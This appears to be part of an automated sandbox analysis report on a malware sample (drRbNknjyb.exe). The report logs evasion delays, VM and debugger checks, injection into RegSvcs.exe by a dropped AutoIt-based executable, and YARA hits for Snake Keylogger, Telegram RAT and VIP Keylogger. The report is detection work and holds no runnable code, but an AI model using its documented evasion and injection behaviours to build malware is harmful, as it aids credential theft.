Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598497	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598387	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597696	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597337	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596998	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595998	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595858	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595749	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595524	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595416	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595304	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594702	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594557	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594436	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594211	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599871	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598947	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598770	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598101	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597973	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595389	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595163	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595044	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594935	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594706	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593250	Jump to behavior

Source: RegSvcs.exe, 0000000A.00000002.2531803667.00000000014E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
Source: wscript.exe, 00000008.00000002.1400815067.00000127AA665000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\L!
Source: RegSvcs.exe, 00000007.00000002.2531755583.0000000000F87000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\drRbNknjyb.exe	API call chain: ExitProcess graph end node	graph_3-104738
Source: C:\Users\user\Desktop\drRbNknjyb.exe	API call chain: ExitProcess graph end node	graph_3-105341
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_065A9668 LdrInitializeThunk,

7_2_065A9668

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00E13F09 BlockInput,

3_2_00E13F09

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00DA3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

3_2_00DA3B3A

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00DD5A7C RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,

3_2_00DD5A7C

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00DA4B37 LoadLibraryA,GetProcAddress,

3_2_00DA4B37

Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_013E3500 mov eax, dword ptr fs:[00000030h]	3_2_013E3500
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_013E3560 mov eax, dword ptr fs:[00000030h]	3_2_013E3560
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_013E1EC0 mov eax, dword ptr fs:[00000030h]	3_2_013E1EC0
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_012B3500 mov eax, dword ptr fs:[00000030h]	6_2_012B3500
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_012B3560 mov eax, dword ptr fs:[00000030h]	6_2_012B3560
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_012B1EC0 mov eax, dword ptr fs:[00000030h]	6_2_012B1EC0
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 9_2_01703560 mov eax, dword ptr fs:[00000030h]	9_2_01703560
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 9_2_01701EC0 mov eax, dword ptr fs:[00000030h]	9_2_01701EC0
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 9_2_01703500 mov eax, dword ptr fs:[00000030h]	9_2_01703500

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00DF80A9 GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,

3_2_00DF80A9

Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DCA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00DCA155
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DCA124 SetUnhandledExceptionFilter,	3_2_00DCA124
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004CA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_004CA155
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004CA124 SetUnhandledExceptionFilter,	6_2_004CA124

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AA4008			Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E4F008			Jump to behavior

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00DF87B1 LogonUserW,

3_2_00DF87B1

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00DA3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

3_2_00DA3B3A

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00DA48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

3_2_00DA48D7

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00E04C7F mouse_event,

3_2_00E04C7F

Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\drRbNknjyb.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe "C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe"	Jump to behavior

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00DF7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

3_2_00DF7CAF

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00DF874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

3_2_00DF874B

Source: drRbNknjyb.exe, 00000003.00000002.1286736785.0000000000E54000.00000040.00000001.01000000.00000003.sdmp, acrorrheuma.exe, 00000006.00000002.1306184995.0000000000554000.00000040.00000001.01000000.00000005.sdmp, acrorrheuma.exe, 00000009.00000002.1424287594.0000000000554000.00000040.00000001.01000000.00000005.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RegSvcs.exe, 00000007.00000002.2532846101.0000000002B4C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2532846101.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2532846101.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR
Source: RegSvcs.exe, 00000007.00000002.2532846101.0000000002B4C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2532846101.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2532846101.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: drRbNknjyb.exe, acrorrheuma.exe	Binary or memory string: Shell_TrayWnd
Source: RegSvcs.exe, 00000007.00000002.2532846101.0000000002B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager`,
Source: RegSvcs.exe, 0000000A.00000002.2533215372.00000000031BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerDkL>

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00DC862B cpuid

3_2_00DC862B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00DD4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_00DD4E87

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00DE1E06 GetUserNameW,

3_2_00DE1E06

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00DD3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

3_2_00DD3F3A

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00DA49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

3_2_00DA49A0

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000A.00000002.2533215372.0000000003021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2532846101.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 6.2.acrorrheuma.exe.3910000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.acrorrheuma.exe.2020000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.acrorrheuma.exe.2020000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.acrorrheuma.exe.3910000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2532846101.0000000002B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2530860588.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: acrorrheuma.exe PID: 732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: acrorrheuma.exe PID: 7212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 6.2.acrorrheuma.exe.3910000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.acrorrheuma.exe.2020000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.acrorrheuma.exe.2020000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.acrorrheuma.exe.3910000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2533215372.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
